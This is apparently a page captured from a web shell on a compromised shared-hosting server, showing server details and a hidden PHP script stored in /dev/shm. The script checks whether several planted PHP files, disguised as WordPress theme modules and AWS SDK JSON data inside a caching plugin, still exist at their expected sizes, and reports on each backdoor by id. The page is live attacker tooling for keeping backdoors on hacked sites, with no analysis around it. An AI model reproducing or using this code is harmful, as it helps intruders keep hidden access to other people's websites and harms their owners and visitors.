HEX
Server: Apache
System: Linux host39.registrar-servers.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: idolaotomotif (3857)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //dev/shm/.holder
<?php   $r = '/home/seghemepanel/public_html'; $x = ["/wp-content/themes/post-1781901158/modules/admin-home/custom_file_4_1781901158.php"=>"bd@@57387@@886",
"/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsecuretunneling/2018-10-05/paginators.1.json.php"=>"bd@@61764@@998",
"/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/streams.dynamodb/2012-08-10/paginators.1.json.php"=>"bd@@61004@@1009",
"/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/api.2.json.php"=>"bd@@62304@@2126",
"/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devops-guru/2020-12-01/api.2.json.php"=>"bd@@61564@@633",
"/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/workmail/2017-10-01/api.2.json.php"=>"bd@@62145@@1872"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');